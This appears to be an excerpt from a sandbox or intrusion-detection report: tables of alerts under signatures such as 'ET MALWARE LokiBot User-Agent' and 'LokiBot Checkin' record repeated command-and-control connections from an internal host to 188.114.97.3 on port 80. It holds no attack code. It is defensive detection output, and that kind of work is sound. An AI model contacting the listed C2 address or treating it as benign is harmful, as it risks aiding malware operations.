2024-09-25T10:21:00.485716+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:01.352133+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:02.141157+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:03.199950+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:04.015053+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:05.131735+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.949911+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:06.745448+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:07.563958+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:08.545523+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:10.666965+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:11.513058+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:12.356325+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:13.248308+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49842	188.114.97.3	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:08.211638+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.969314+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.837774+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.688864+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.615421+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.711569+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.581402+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.376989+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.178646+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.296157+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:19.154274+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:20.137435+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:21.053477+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.842648+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.855192+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.676953+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.570672+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.439700+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.269752+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.206792+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:29.037709+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.847888+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.733826+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:32.177777+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.989857+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.800027+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.631187+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.482687+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.537688+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.356070+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:39.239881+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:40.078687+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.911451+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.735560+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.570720+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.399885+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.190956+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:45.016789+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.828745+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.711712+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.595407+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.437321+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.234722+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:50.049266+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.858143+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.659793+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.634585+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.523329+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.536452+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.485678+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.301649+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.172763+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:59.000979+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.891904+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.718978+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.526168+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.392071+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.257255+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:04.071220+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:05.030104+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.858737+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.718238+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.582940+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.443638+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:10.343573+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.162336+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.972432+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.784342+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.600309+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.393221+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.204070+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:16.046849+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.874999+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.701124+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.577128+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.388646+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.429528+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.233233+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:22.045367+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.876653+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.686182+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.545070+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.516198+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:26.367186+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.187595+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:28.005117+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.823348+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.793057+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.724248+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.529840+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.349270+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.159073+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:34.004751+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.831696+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.676731+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.488105+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.347438+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.170705+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.983344+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.812510+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.679656+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.532089+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.407099+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.201046+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:44.020697+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.843940+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.767835+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.581998+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.383984+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.345316+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.177011+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.264754+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:51.117098+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.965926+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.847890+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.648400+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.469239+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.277763+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:56.095548+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.943672+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.765117+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.604735+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.652378+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.509563+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.530015+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:03.370905+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.493818+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.272946+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:06.101214+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.901425+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.859251+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:09.943417+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.818081+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.674440+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.571148+0200	2021641	1	A Network Trojan was detected	192.168.2.7	49842	188.114.97.3	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:08.211638+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.969314+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.837774+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.688864+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.615421+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.711569+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.581402+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.376989+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.178646+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.296157+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:19.154274+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:20.137435+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:21.053477+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.842648+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.855192+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.676953+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.570672+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.439700+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.269752+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.206792+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:29.037709+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.847888+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.733826+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:32.177777+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.989857+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.800027+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.631187+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.482687+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.537688+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.356070+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:39.239881+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:40.078687+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.911451+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.735560+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.570720+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.399885+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.190956+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:45.016789+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.828745+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.711712+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.595407+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.437321+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.234722+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:50.049266+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.858143+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.659793+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.634585+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.523329+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.536452+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.485678+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.301649+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.172763+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:59.000979+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.891904+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.718978+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.526168+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.392071+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.257255+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:04.071220+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:05.030104+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.858737+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.718238+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.582940+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.443638+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:10.343573+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.162336+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.972432+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.784342+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.600309+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.393221+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.204070+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:16.046849+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.874999+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.701124+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.577128+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.388646+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.429528+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.233233+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:22.045367+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.876653+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.686182+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.545070+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.516198+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49789	188.114.97.3	80	TCP
